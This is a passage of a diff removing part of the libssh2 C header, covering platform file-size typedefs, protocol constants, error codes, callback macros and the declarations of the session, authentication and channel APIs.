-#else /* !WIN32 */
-typedef int libssh2_socket_t;
-#define LIBSSH2_INVALID_SOCKET -1
-#endif /* WIN32 */
-
-/*
- * Determine whether there is small or large file support on windows.
- */
-
-#if defined(_MSC_VER) && !defined(_WIN32_WCE)
-#  if (_MSC_VER >= 900) && (_INTEGRAL_MAX_BITS >= 64)
-#    define LIBSSH2_USE_WIN32_LARGE_FILES
-#  else
-#    define LIBSSH2_USE_WIN32_SMALL_FILES
-#  endif
-#endif
-
-#if defined(__MINGW32__) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES)
-#  define LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(__WATCOMC__) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES)
-#  define LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(__POCC__)
-#  undef LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(_WIN32) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES) && \
-    !defined(LIBSSH2_USE_WIN32_SMALL_FILES)
-#  define LIBSSH2_USE_WIN32_SMALL_FILES
-#endif
-
-/*
- * Large file (>2Gb) support using WIN32 functions.
- */
-
-#ifdef LIBSSH2_USE_WIN32_LARGE_FILES
-#  include <io.h>
-#  include <sys/types.h>
-#  include <sys/stat.h>
-#  define LIBSSH2_STRUCT_STAT_SIZE_FORMAT    "%I64d"
-typedef struct _stati64 libssh2_struct_stat;
-typedef __int64 libssh2_struct_stat_size;
-#endif
-
-/*
- * Small file (<2Gb) support using WIN32 functions.
- */
-
-#ifdef LIBSSH2_USE_WIN32_SMALL_FILES
-#  include <sys/types.h>
-#  include <sys/stat.h>
-#  ifndef _WIN32_WCE
-#    define LIBSSH2_STRUCT_STAT_SIZE_FORMAT    "%d"
-typedef struct _stat libssh2_struct_stat;
-typedef off_t libssh2_struct_stat_size;
-#  endif
-#endif
-
-#ifndef LIBSSH2_STRUCT_STAT_SIZE_FORMAT
-#  ifdef __VMS
-/* We have to roll our own format here because %z is a C99-ism we don't have. */
-#    if __USE_OFF64_T || __USING_STD_STAT
-#      define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%Ld"
-#    else
-#      define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%d"
-#    endif
-#  else
-#    define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%zd"
-#  endif
-typedef struct stat libssh2_struct_stat;
-typedef off_t libssh2_struct_stat_size;
-#endif
-
-/* Part of every banner, user specified or not */
-#define LIBSSH2_SSH_BANNER                  "SSH-2.0-libssh2_" LIBSSH2_VERSION
-
-/* We *could* add a comment here if we so chose */
-#define LIBSSH2_SSH_DEFAULT_BANNER                  LIBSSH2_SSH_BANNER
-#define LIBSSH2_SSH_DEFAULT_BANNER_WITH_CRLF        LIBSSH2_SSH_DEFAULT_BANNER "\r\n"
-
-/* Default generate and safe prime sizes for diffie-hellman-group-exchange-sha1 */
-#define LIBSSH2_DH_GEX_MINGROUP     1024
-#define LIBSSH2_DH_GEX_OPTGROUP     1536
-#define LIBSSH2_DH_GEX_MAXGROUP     2048
-
-/* Defaults for pty requests */
-#define LIBSSH2_TERM_WIDTH      80
-#define LIBSSH2_TERM_HEIGHT     24
-#define LIBSSH2_TERM_WIDTH_PX   0
-#define LIBSSH2_TERM_HEIGHT_PX  0
-
-/* 1/4 second */
-#define LIBSSH2_SOCKET_POLL_UDELAY      250000
-/* 0.25 * 120 == 30 seconds */
-#define LIBSSH2_SOCKET_POLL_MAXLOOPS    120
-
-/* Maximum size to allow a payload to compress to, plays it safe by falling
-   short of spec limits */
-#define LIBSSH2_PACKET_MAXCOMP      32000
-
-/* Maximum size to allow a payload to deccompress to, plays it safe by
-   allowing more than spec requires */
-#define LIBSSH2_PACKET_MAXDECOMP    40000
-
-/* Maximum size for an inbound compressed payload, plays it safe by
-   overshooting spec limits */
-#define LIBSSH2_PACKET_MAXPAYLOAD   40000
-
-/* Malloc callbacks */
-#define LIBSSH2_ALLOC_FUNC(name)   void *name(size_t count, void **abstract)
-#define LIBSSH2_REALLOC_FUNC(name) void *name(void *ptr, size_t count, \
-                                              void **abstract)
-#define LIBSSH2_FREE_FUNC(name)    void name(void *ptr, void **abstract)
-
-typedef struct _LIBSSH2_USERAUTH_KBDINT_PROMPT
-{
-    char* text;
-    unsigned int length;
-    unsigned char echo;
-} LIBSSH2_USERAUTH_KBDINT_PROMPT;
-
-typedef struct _LIBSSH2_USERAUTH_KBDINT_RESPONSE
-{
-    char* text;
-    unsigned int length;
-} LIBSSH2_USERAUTH_KBDINT_RESPONSE;
-
-/* 'publickey' authentication callback */
-#define LIBSSH2_USERAUTH_PUBLICKEY_SIGN_FUNC(name) \
-  int name(LIBSSH2_SESSION *session, unsigned char **sig, size_t *sig_len, \
-           const unsigned char *data, size_t data_len, void **abstract)
-
-/* 'keyboard-interactive' authentication callback */
-#define LIBSSH2_USERAUTH_KBDINT_RESPONSE_FUNC(name_) \
- void name_(const char* name, int name_len, const char* instruction, \
-            int instruction_len, int num_prompts, \
-            const LIBSSH2_USERAUTH_KBDINT_PROMPT* prompts, \
-            LIBSSH2_USERAUTH_KBDINT_RESPONSE* responses, void **abstract)
-
-/* Callbacks for special SSH packets */
-#define LIBSSH2_IGNORE_FUNC(name) \
- void name(LIBSSH2_SESSION *session, const char *message, int message_len, \
-           void **abstract)
-
-#define LIBSSH2_DEBUG_FUNC(name) \
- void name(LIBSSH2_SESSION *session, int always_display, const char *message, \
-           int message_len, const char *language, int language_len, \
-           void **abstract)
-
-#define LIBSSH2_DISCONNECT_FUNC(name) \
- void name(LIBSSH2_SESSION *session, int reason, const char *message, \
-           int message_len, const char *language, int language_len, \
-           void **abstract)
-
-#define LIBSSH2_PASSWD_CHANGEREQ_FUNC(name) \
- void name(LIBSSH2_SESSION *session, char **newpw, int *newpw_len, \
-           void **abstract)
-
-#define LIBSSH2_MACERROR_FUNC(name) \
- int name(LIBSSH2_SESSION *session, const char *packet, int packet_len, \
-          void **abstract)
-
-#define LIBSSH2_X11_OPEN_FUNC(name) \
- void name(LIBSSH2_SESSION *session, LIBSSH2_CHANNEL *channel, \
-           const char *shost, int sport, void **abstract)
-
-#define LIBSSH2_CHANNEL_CLOSE_FUNC(name) \
-  void name(LIBSSH2_SESSION *session, void **session_abstract, \
-            LIBSSH2_CHANNEL *channel, void **channel_abstract)
-
-/* I/O callbacks */
-#define LIBSSH2_RECV_FUNC(name)  ssize_t name(libssh2_socket_t socket, \
-                                              void *buffer, size_t length, \
-                                              int flags, void **abstract)
-#define LIBSSH2_SEND_FUNC(name)  ssize_t name(libssh2_socket_t socket, \
-                                              const void *buffer, size_t length,\
-                                              int flags, void **abstract)
-
-/* libssh2_session_callback_set() constants */
-#define LIBSSH2_CALLBACK_IGNORE             0
-#define LIBSSH2_CALLBACK_DEBUG              1
-#define LIBSSH2_CALLBACK_DISCONNECT         2
-#define LIBSSH2_CALLBACK_MACERROR           3
-#define LIBSSH2_CALLBACK_X11                4
-#define LIBSSH2_CALLBACK_SEND               5
-#define LIBSSH2_CALLBACK_RECV               6
-
-/* libssh2_session_method_pref() constants */
-#define LIBSSH2_METHOD_KEX          0
-#define LIBSSH2_METHOD_HOSTKEY      1
-#define LIBSSH2_METHOD_CRYPT_CS     2
-#define LIBSSH2_METHOD_CRYPT_SC     3
-#define LIBSSH2_METHOD_MAC_CS       4
-#define LIBSSH2_METHOD_MAC_SC       5
-#define LIBSSH2_METHOD_COMP_CS      6
-#define LIBSSH2_METHOD_COMP_SC      7
-#define LIBSSH2_METHOD_LANG_CS      8
-#define LIBSSH2_METHOD_LANG_SC      9
-
-/* flags */
-#define LIBSSH2_FLAG_SIGPIPE        1
-#define LIBSSH2_FLAG_COMPRESS       2
-
-typedef struct _LIBSSH2_SESSION                     LIBSSH2_SESSION;
-typedef struct _LIBSSH2_CHANNEL                     LIBSSH2_CHANNEL;
-typedef struct _LIBSSH2_LISTENER                    LIBSSH2_LISTENER;
-typedef struct _LIBSSH2_KNOWNHOSTS                  LIBSSH2_KNOWNHOSTS;
-typedef struct _LIBSSH2_AGENT                       LIBSSH2_AGENT;
-
-typedef struct _LIBSSH2_POLLFD {
-    unsigned char type; /* LIBSSH2_POLLFD_* below */
-
-    union {
-        libssh2_socket_t socket; /* File descriptors -- examined with
-                                    system select() call */
-        LIBSSH2_CHANNEL *channel; /* Examined by checking internal state */
-        LIBSSH2_LISTENER *listener; /* Read polls only -- are inbound
-                                       connections waiting to be accepted? */
-    } fd;
-
-    unsigned long events; /* Requested Events */
-    unsigned long revents; /* Returned Events */
-} LIBSSH2_POLLFD;
-
-/* Poll FD Descriptor Types */
-#define LIBSSH2_POLLFD_SOCKET       1
-#define LIBSSH2_POLLFD_CHANNEL      2
-#define LIBSSH2_POLLFD_LISTENER     3
-
-/* Note: Win32 Doesn't actually have a poll() implementation, so some of these
-   values are faked with select() data */
-/* Poll FD events/revents -- Match sys/poll.h where possible */
-#define LIBSSH2_POLLFD_POLLIN           0x0001 /* Data available to be read or
-                                                  connection available --
-                                                  All */
-#define LIBSSH2_POLLFD_POLLPRI          0x0002 /* Priority data available to
-                                                  be read -- Socket only */
-#define LIBSSH2_POLLFD_POLLEXT          0x0002 /* Extended data available to
-                                                  be read -- Channel only */
-#define LIBSSH2_POLLFD_POLLOUT          0x0004 /* Can may be written --
-                                                  Socket/Channel */
-/* revents only */
-#define LIBSSH2_POLLFD_POLLERR          0x0008 /* Error Condition -- Socket */
-#define LIBSSH2_POLLFD_POLLHUP          0x0010 /* HangUp/EOF -- Socket */
-#define LIBSSH2_POLLFD_SESSION_CLOSED   0x0010 /* Session Disconnect */
-#define LIBSSH2_POLLFD_POLLNVAL         0x0020 /* Invalid request -- Socket
-                                                  Only */
-#define LIBSSH2_POLLFD_POLLEX           0x0040 /* Exception Condition --
-                                                  Socket/Win32 */
-#define LIBSSH2_POLLFD_CHANNEL_CLOSED   0x0080 /* Channel Disconnect */
-#define LIBSSH2_POLLFD_LISTENER_CLOSED  0x0080 /* Listener Disconnect */
-
-#define HAVE_LIBSSH2_SESSION_BLOCK_DIRECTION
-/* Block Direction Types */
-#define LIBSSH2_SESSION_BLOCK_INBOUND                  0x0001
-#define LIBSSH2_SESSION_BLOCK_OUTBOUND                 0x0002
-
-/* Hash Types */
-#define LIBSSH2_HOSTKEY_HASH_MD5                            1
-#define LIBSSH2_HOSTKEY_HASH_SHA1                           2
-
-/* Hostkey Types */
-#define LIBSSH2_HOSTKEY_TYPE_UNKNOWN			    0
-#define LIBSSH2_HOSTKEY_TYPE_RSA			    1
-#define LIBSSH2_HOSTKEY_TYPE_DSS			    2
-
-/* Disconnect Codes (defined by SSH protocol) */
-#define SSH_DISCONNECT_HOST_NOT_ALLOWED_TO_CONNECT          1
-#define SSH_DISCONNECT_PROTOCOL_ERROR                       2
-#define SSH_DISCONNECT_KEY_EXCHANGE_FAILED                  3
-#define SSH_DISCONNECT_RESERVED                             4
-#define SSH_DISCONNECT_MAC_ERROR                            5
-#define SSH_DISCONNECT_COMPRESSION_ERROR                    6
-#define SSH_DISCONNECT_SERVICE_NOT_AVAILABLE                7
-#define SSH_DISCONNECT_PROTOCOL_VERSION_NOT_SUPPORTED       8
-#define SSH_DISCONNECT_HOST_KEY_NOT_VERIFIABLE              9
-#define SSH_DISCONNECT_CONNECTION_LOST                      10
-#define SSH_DISCONNECT_BY_APPLICATION                       11
-#define SSH_DISCONNECT_TOO_MANY_CONNECTIONS                 12
-#define SSH_DISCONNECT_AUTH_CANCELLED_BY_USER               13
-#define SSH_DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE       14
-#define SSH_DISCONNECT_ILLEGAL_USER_NAME                    15
-
-/* Error Codes (defined by libssh2) */
-#define LIBSSH2_ERROR_NONE                      0
-
-/* The library once used -1 as a generic error return value on numerous places
-   through the code, which subsequently was converted to
-   LIBSSH2_ERROR_SOCKET_NONE uses over time. As this is a generic error code,
-   the goal is to never ever return this code but instead make sure that a
-   more accurate and descriptive error code is used. */
-#define LIBSSH2_ERROR_SOCKET_NONE               -1
-
-#define LIBSSH2_ERROR_BANNER_RECV               -2
-#define LIBSSH2_ERROR_BANNER_SEND               -3
-#define LIBSSH2_ERROR_INVALID_MAC               -4
-#define LIBSSH2_ERROR_KEX_FAILURE               -5
-#define LIBSSH2_ERROR_ALLOC                     -6
-#define LIBSSH2_ERROR_SOCKET_SEND               -7
-#define LIBSSH2_ERROR_KEY_EXCHANGE_FAILURE      -8
-#define LIBSSH2_ERROR_TIMEOUT                   -9
-#define LIBSSH2_ERROR_HOSTKEY_INIT              -10
-#define LIBSSH2_ERROR_HOSTKEY_SIGN              -11
-#define LIBSSH2_ERROR_DECRYPT                   -12
-#define LIBSSH2_ERROR_SOCKET_DISCONNECT         -13
-#define LIBSSH2_ERROR_PROTO                     -14
-#define LIBSSH2_ERROR_PASSWORD_EXPIRED          -15
-#define LIBSSH2_ERROR_FILE                      -16
-#define LIBSSH2_ERROR_METHOD_NONE               -17
-#define LIBSSH2_ERROR_AUTHENTICATION_FAILED     -18
-#define LIBSSH2_ERROR_PUBLICKEY_UNRECOGNIZED    LIBSSH2_ERROR_AUTHENTICATION_FAILED
-#define LIBSSH2_ERROR_PUBLICKEY_UNVERIFIED      -19
-#define LIBSSH2_ERROR_CHANNEL_OUTOFORDER        -20
-#define LIBSSH2_ERROR_CHANNEL_FAILURE           -21
-#define LIBSSH2_ERROR_CHANNEL_REQUEST_DENIED    -22
-#define LIBSSH2_ERROR_CHANNEL_UNKNOWN           -23
-#define LIBSSH2_ERROR_CHANNEL_WINDOW_EXCEEDED   -24
-#define LIBSSH2_ERROR_CHANNEL_PACKET_EXCEEDED   -25
-#define LIBSSH2_ERROR_CHANNEL_CLOSED            -26
-#define LIBSSH2_ERROR_CHANNEL_EOF_SENT          -27
-#define LIBSSH2_ERROR_SCP_PROTOCOL              -28
-#define LIBSSH2_ERROR_ZLIB                      -29
-#define LIBSSH2_ERROR_SOCKET_TIMEOUT            -30
-#define LIBSSH2_ERROR_SFTP_PROTOCOL             -31
-#define LIBSSH2_ERROR_REQUEST_DENIED            -32
-#define LIBSSH2_ERROR_METHOD_NOT_SUPPORTED      -33
-#define LIBSSH2_ERROR_INVAL                     -34
-#define LIBSSH2_ERROR_INVALID_POLL_TYPE         -35
-#define LIBSSH2_ERROR_PUBLICKEY_PROTOCOL        -36
-#define LIBSSH2_ERROR_EAGAIN                    -37
-#define LIBSSH2_ERROR_BUFFER_TOO_SMALL          -38
-#define LIBSSH2_ERROR_BAD_USE                   -39
-#define LIBSSH2_ERROR_COMPRESS                  -40
-#define LIBSSH2_ERROR_OUT_OF_BOUNDARY           -41
-#define LIBSSH2_ERROR_AGENT_PROTOCOL            -42
-#define LIBSSH2_ERROR_SOCKET_RECV               -43
-#define LIBSSH2_ERROR_ENCRYPT                   -44
-#define LIBSSH2_ERROR_BAD_SOCKET                -45
-#define LIBSSH2_ERROR_KNOWN_HOSTS               -46
-
-/* this is a define to provide the old (<= 1.2.7) name */
-#define LIBSSH2_ERROR_BANNER_NONE LIBSSH2_ERROR_BANNER_RECV
-
-/* Global API */
-#define LIBSSH2_INIT_NO_CRYPTO        0x0001
-
-/*
- * libssh2_init()
- *
- * Initialize the libssh2 functions.  This typically initialize the
- * crypto library.  It uses a global state, and is not thread safe --
- * you must make sure this function is not called concurrently.
- *
- * Flags can be:
- * 0:                              Normal initialize
- * LIBSSH2_INIT_NO_CRYPTO:         Do not initialize the crypto library (ie.
- *                                 OPENSSL_add_cipher_algoritms() for OpenSSL
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int libssh2_init(int flags);
-
-/*
- * libssh2_exit()
- *
- * Exit the libssh2 functions and free's all memory used internal.
- */
-LIBSSH2_API void libssh2_exit(void);
-
-/*
- * libssh2_free()
- *
- * Deallocate memory allocated by earlier call to libssh2 functions.
- */
-LIBSSH2_API void libssh2_free(LIBSSH2_SESSION *session, void *ptr);
-
-/*
- * libssh2_session_supported_algs()
- *
- * Fills algs with a list of supported acryptographic algorithms. Returns a
- * non-negative number (number of supported algorithms) on success or a
- * negative number (an eror code) on failure.
- *
- * NOTE: on success, algs must be deallocated (by calling libssh2_free) when
- * not needed anymore
- */
-LIBSSH2_API int libssh2_session_supported_algs(LIBSSH2_SESSION* session,
-                                               int method_type,
-                                               const char*** algs);
-
-/* Session API */
-LIBSSH2_API LIBSSH2_SESSION *
-libssh2_session_init_ex(LIBSSH2_ALLOC_FUNC((*my_alloc)),
-                        LIBSSH2_FREE_FUNC((*my_free)),
-                        LIBSSH2_REALLOC_FUNC((*my_realloc)), void *abstract);
-#define libssh2_session_init() libssh2_session_init_ex(NULL, NULL, NULL, NULL)
-
-LIBSSH2_API void **libssh2_session_abstract(LIBSSH2_SESSION *session);
-
-LIBSSH2_API void *libssh2_session_callback_set(LIBSSH2_SESSION *session,
-                                               int cbtype, void *callback);
-LIBSSH2_API int libssh2_session_banner_set(LIBSSH2_SESSION *session,
-                                           const char *banner);
-LIBSSH2_API int libssh2_banner_set(LIBSSH2_SESSION *session,
-                                   const char *banner);
-
-LIBSSH2_API int libssh2_session_startup(LIBSSH2_SESSION *session, int sock);
-LIBSSH2_API int libssh2_session_handshake(LIBSSH2_SESSION *session,
-                                          libssh2_socket_t sock);
-LIBSSH2_API int libssh2_session_disconnect_ex(LIBSSH2_SESSION *session,
-                                              int reason,
-                                              const char *description,
-                                              const char *lang);
-#define libssh2_session_disconnect(session, description) \
-  libssh2_session_disconnect_ex((session), SSH_DISCONNECT_BY_APPLICATION, \
-                                (description), "")
-
-LIBSSH2_API int libssh2_session_free(LIBSSH2_SESSION *session);
-
-LIBSSH2_API const char *libssh2_hostkey_hash(LIBSSH2_SESSION *session,
-                                             int hash_type);
-
-LIBSSH2_API const char *libssh2_session_hostkey(LIBSSH2_SESSION *session,
-                                                size_t *len, int *type);
-
-LIBSSH2_API int libssh2_session_method_pref(LIBSSH2_SESSION *session,
-                                            int method_type,
-                                            const char *prefs);
-LIBSSH2_API const char *libssh2_session_methods(LIBSSH2_SESSION *session,
-                                                int method_type);
-LIBSSH2_API int libssh2_session_last_error(LIBSSH2_SESSION *session,
-                                           char **errmsg,
-                                           int *errmsg_len, int want_buf);
-LIBSSH2_API int libssh2_session_last_errno(LIBSSH2_SESSION *session);
-LIBSSH2_API int libssh2_session_set_last_error(LIBSSH2_SESSION* session,
-                                               int errcode,
-                                               const char* errmsg);
-LIBSSH2_API int libssh2_session_block_directions(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_session_flag(LIBSSH2_SESSION *session, int flag,
-                                     int value);
-LIBSSH2_API const char *libssh2_session_banner_get(LIBSSH2_SESSION *session);
-
-/* Userauth API */
-LIBSSH2_API char *libssh2_userauth_list(LIBSSH2_SESSION *session,
-                                        const char *username,
-                                        unsigned int username_len);
-LIBSSH2_API int libssh2_userauth_authenticated(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_userauth_password_ex(LIBSSH2_SESSION *session,
-                                             const char *username,
-                                             unsigned int username_len,
-                                             const char *password,
-                                             unsigned int password_len,
-                                             LIBSSH2_PASSWD_CHANGEREQ_FUNC((*passwd_change_cb)));
-
-#define libssh2_userauth_password(session, username, password) \
- libssh2_userauth_password_ex((session), (username),           \
-                              (unsigned int)strlen(username),  \
-                              (password), (unsigned int)strlen(password), NULL)
-
-LIBSSH2_API int
-libssh2_userauth_publickey_fromfile_ex(LIBSSH2_SESSION *session,
-                                       const char *username,
-                                       unsigned int username_len,
-                                       const char *publickey,
-                                       const char *privatekey,
-                                       const char *passphrase);
-
-#define libssh2_userauth_publickey_fromfile(session, username, publickey, \
-                                            privatekey, passphrase)     \
-    libssh2_userauth_publickey_fromfile_ex((session), (username),       \
-                                           (unsigned int)strlen(username), \
-                                           (publickey),                 \
-                                           (privatekey), (passphrase))
-
-LIBSSH2_API int
-libssh2_userauth_publickey(LIBSSH2_SESSION *session,
-                           const char *username,
-                           const unsigned char *pubkeydata,
-                           size_t pubkeydata_len,
-                           LIBSSH2_USERAUTH_PUBLICKEY_SIGN_FUNC((*sign_callback)),
-                           void **abstract);
-
-LIBSSH2_API int
-libssh2_userauth_hostbased_fromfile_ex(LIBSSH2_SESSION *session,
-                                       const char *username,
-                                       unsigned int username_len,
-                                       const char *publickey,
-                                       const char *privatekey,
-                                       const char *passphrase,
-                                       const char *hostname,
-                                       unsigned int hostname_len,
-                                       const char *local_username,
-                                       unsigned int local_username_len);
-
-#define libssh2_userauth_hostbased_fromfile(session, username, publickey, \
-                                            privatekey, passphrase, hostname) \
- libssh2_userauth_hostbased_fromfile_ex((session), (username), \
-                                        (unsigned int)strlen(username), \
-                                        (publickey),                    \
-                                        (privatekey), (passphrase),     \
-                                        (hostname),                     \
-                                        (unsigned int)strlen(hostname), \
-                                        (username),                     \
-                                        (unsigned int)strlen(username))
-
-LIBSSH2_API int
-libssh2_userauth_publickey_frommemory(LIBSSH2_SESSION *session,
-                                      const char *username,
-                                      size_t username_len,
-                                      const char *publickeyfiledata,
-                                      size_t publickeyfiledata_len,
-                                      const char *privatekeyfiledata,
-                                      size_t privatekeyfiledata_len,
-                                      const char *passphrase);
-
-/*
- * response_callback is provided with filled by library prompts array,
- * but client must allocate and fill individual responses. Responses
- * array is already allocated. Responses data will be freed by libssh2
- * after callback return, but before subsequent callback invokation.
- */
-LIBSSH2_API int
-libssh2_userauth_keyboard_interactive_ex(LIBSSH2_SESSION* session,
-                                         const char *username,
-                                         unsigned int username_len,
-                                         LIBSSH2_USERAUTH_KBDINT_RESPONSE_FUNC(
-                                                       (*response_callback)));
-
-#define libssh2_userauth_keyboard_interactive(session, username,        \
-                                              response_callback)        \
-    libssh2_userauth_keyboard_interactive_ex((session), (username),     \
-                                             (unsigned int)strlen(username), \
-                                             (response_callback))
-
-LIBSSH2_API int libssh2_poll(LIBSSH2_POLLFD *fds, unsigned int nfds,
-                             long timeout);
-
-/* Channel API */
-#define LIBSSH2_CHANNEL_WINDOW_DEFAULT  (2*1024*1024)
-#define LIBSSH2_CHANNEL_PACKET_DEFAULT  32768
-#define LIBSSH2_CHANNEL_MINADJUST       1024
-
-/* Extended Data Handling */
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_NORMAL        0
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_IGNORE        1
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_MERGE         2
-
-#define SSH_EXTENDED_DATA_STDERR 1
-
-/* Returned by any function that would block during a read/write opperation */
-#define LIBSSH2CHANNEL_EAGAIN LIBSSH2_ERROR_EAGAIN
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_open_ex(LIBSSH2_SESSION *session, const char *channel_type,
-                        unsigned int channel_type_len,
-                        unsigned int window_size, unsigned int packet_size,
-                        const char *message, unsigned int message_len);
-
-#define libssh2_channel_open_session(session) \
-  libssh2_channel_open_ex((session), "session", sizeof("session") - 1, \
-                          LIBSSH2_CHANNEL_WINDOW_DEFAULT, \
-                          LIBSSH2_CHANNEL_PACKET_DEFAULT, NULL, 0)
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_direct_tcpip_ex(LIBSSH2_SESSION *session, const char *host,
-                                int port, const char *shost, int sport);
-#define libssh2_channel_direct_tcpip(session, host, port) \
-  libssh2_channel_direct_tcpip_ex((session), (host), (port), "127.0.0.1", 22)
-
-LIBSSH2_API LIBSSH2_LISTENER *
-libssh2_channel_forward_listen_ex(LIBSSH2_SESSION *session, const char *host,
-                                  int port, int *bound_port, int queue_maxsize);
-#define libssh2_channel_forward_listen(session, port) \
- libssh2_channel_forward_listen_ex((session), NULL, (port), NULL, 16)
-
-LIBSSH2_API int libssh2_channel_forward_cancel(LIBSSH2_LISTENER *listener);
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_forward_accept(LIBSSH2_LISTENER *listener);
-
-LIBSSH2_API int libssh2_channel_setenv_ex(LIBSSH2_CHANNEL *channel,
-                                          const char *varname,
-                                          unsigned int varname_len,
-                                          const char *value,
-                                          unsigned int value_len);
-
-#define libssh2_channel_setenv(channel, varname, value)                 \
-    libssh2_channel_setenv_ex((channel), (varname),                     \
-                              (unsigned int)strlen(varname), (value),   \
-                              (unsigned int)strlen(value))
-
-LIBSSH2_API int libssh2_channel_request_pty_ex(LIBSSH2_CHANNEL *channel,
-                                               const char *term,
-                                               unsigned int term_len,
-                                               const char *modes,
-                                               unsigned int modes_len,
-                                               int width, int height,
-                                               int width_px, int height_px);
-#define libssh2_channel_request_pty(channel, term)                      \
-    libssh2_channel_request_pty_ex((channel), (term),                   \
-                                   (unsigned int)strlen(term),          \
-                                   NULL, 0,                             \
-                                   LIBSSH2_TERM_WIDTH, LIBSSH2_TERM_HEIGHT, \
-                                   LIBSSH2_TERM_WIDTH_PX, LIBSSH2_TERM_HEIGHT_PX)
-
-LIBSSH2_API int libssh2_channel_request_pty_size_ex(LIBSSH2_CHANNEL *channel,
-                                                    int width, int height,
-                                                    int width_px,
-                                                    int height_px);
-#define libssh2_channel_request_pty_size(channel, width, height) \
-  libssh2_channel_request_pty_size_ex( (channel), (width), (height), 0, 0)
-
-LIBSSH2_API int libssh2_channel_x11_req_ex(LIBSSH2_CHANNEL *channel,
-                                           int single_connection,
-                                           const char *auth_proto,
-                                           const char *auth_cookie,
-                                           int screen_number);
-#define libssh2_channel_x11_req(channel, screen_number) \
- libssh2_channel_x11_req_ex((channel), 0, NULL, NULL, (screen_number))
-
-LIBSSH2_API int libssh2_channel_process_startup(LIBSSH2_CHANNEL *channel,
-                                                const char *request,
-                                                unsigned int request_len,
-                                                const char *message,
-                                                unsigned int message_len);
-#define libssh2_channel_shell(channel) \
-  libssh2_channel_process_startup((channel), "shell", sizeof("shell") - 1, \
-                                  NULL, 0)
-#define libssh2_channel_exec(channel, command) \
-  libssh2_channel_process_startup((channel), "exec", sizeof("exec") - 1, \
-                                  (command), (unsigned int)strlen(command))
-#define libssh2_channel_subsystem(channel, subsystem) \
-  libssh2_channel_process_startup((channel), "subsystem",              \
-                                  sizeof("subsystem") - 1, (subsystem), \
-                                  (unsigned int)strlen(subsystem))
-
-LIBSSH2_API ssize_t libssh2_channel_read_ex(LIBSSH2_CHANNEL *channel,
-                                            int stream_id, char *buf,
-                                            size_t buflen);
-#define libssh2_channel_read(channel, buf, buflen) \
-  libssh2_channel_read_ex((channel), 0, (buf), (buflen))
-#define libssh2_channel_read_stderr(channel, buf, buflen) \
-  libssh2_channel_read_ex((channel), SSH_EXTENDED_DATA_STDERR, (buf), (buflen))
-
-LIBSSH2_API int libssh2_poll_channel_read(LIBSSH2_CHANNEL *channel,
-                                          int extended);
-
-LIBSSH2_API unsigned long
-libssh2_channel_window_read_ex(LIBSSH2_CHANNEL *channel,
-                               unsigned long *read_avail,
-                               unsigned long *window_size_initial);
-#define libssh2_channel_window_read(channel) \
-  libssh2_channel_window_read_ex((channel), NULL, NULL)
-
-/* libssh2_channel_receive_window_adjust is DEPRECATED, do not use! */
-LIBSSH2_API unsigned long
-libssh2_channel_receive_window_adjust(LIBSSH2_CHANNEL *channel,
-                                      unsigned long adjustment,
-                                      unsigned char force);
-
-LIBSSH2_API int
-libssh2_channel_receive_window_adjust2(LIBSSH2_CHANNEL *channel,
-                                       unsigned long adjustment,
-                                       unsigned char force,
-                                       unsigned int *storewindow);
-
-LIBSSH2_API ssize_t libssh2_channel_write_ex(LIBSSH2_CHANNEL *channel,
-                                             int stream_id, const char *buf,
-                                             size_t buflen);
-
-#define libssh2_channel_write(channel, buf, buflen) \
-  libssh2_channel_write_ex((channel), 0, (buf), (buflen))
-#define libssh2_channel_write_stderr(channel, buf, buflen)  \
-  libssh2_channel_write_ex((channel), SSH_EXTENDED_DATA_STDERR, (buf), (buflen))
-
-LIBSSH2_API unsigned long
-libssh2_channel_window_write_ex(LIBSSH2_CHANNEL *channel,
-                                unsigned long *window_size_initial);
-#define libssh2_channel_window_write(channel) \
-  libssh2_channel_window_write_ex((channel), NULL)
-
-LIBSSH2_API void libssh2_session_set_blocking(LIBSSH2_SESSION* session,
-                                              int blocking);
-LIBSSH2_API int libssh2_session_get_blocking(LIBSSH2_SESSION* session);
-
-LIBSSH2_API void libssh2_channel_set_blocking(LIBSSH2_CHANNEL *channel,
-                                              int blocking);
-
-LIBSSH2_API void libssh2_session_set_timeout(LIBSSH2_SESSION* session,
-                                             long timeout);
-LIBSSH2_API long libssh2_session_get_timeout(LIBSSH2_SESSION* session);
-
-/* libssh2_channel_handle_extended_data is DEPRECATED, do not use! */
-LIBSSH2_API void libssh2_channel_handle_extended_data(LIBSSH2_CHANNEL *channel,
-                                                      int ignore_mode);
-LIBSSH2_API int libssh2_channel_handle_extended_data2(LIBSSH2_CHANNEL *channel,
-                                                      int ignore_mode);
-
-/* libssh2_channel_ignore_extended_data() is defined below for BC with version
- * 0.1
- *
- * Future uses should use libssh2_channel_handle_extended_data() directly if
- * LIBSSH2_CHANNEL_EXTENDED_DATA_MERGE is passed, extended data will be read
- * (FIFO) from the standard data channel
- */
-/* DEPRECATED */
-#define libssh2_channel_ignore_extended_data(channel, ignore) \
-  libssh2_channel_handle_extended_data((channel),                       \
-                                       (ignore) ?                       \
-                                       LIBSSH2_CHANNEL_EXTENDED_DATA_IGNORE : \
-                                       LIBSSH2_CHANNEL_EXTENDED_DATA_NORMAL )
-
-#define LIBSSH2_CHANNEL_FLUSH_EXTENDED_DATA     -1
-#define LIBSSH2_CHANNEL_FLUSH_ALL               -2
-LIBSSH2_API int libssh2_channel_flush_ex(LIBSSH2_CHANNEL *channel,
-                                         int streamid);
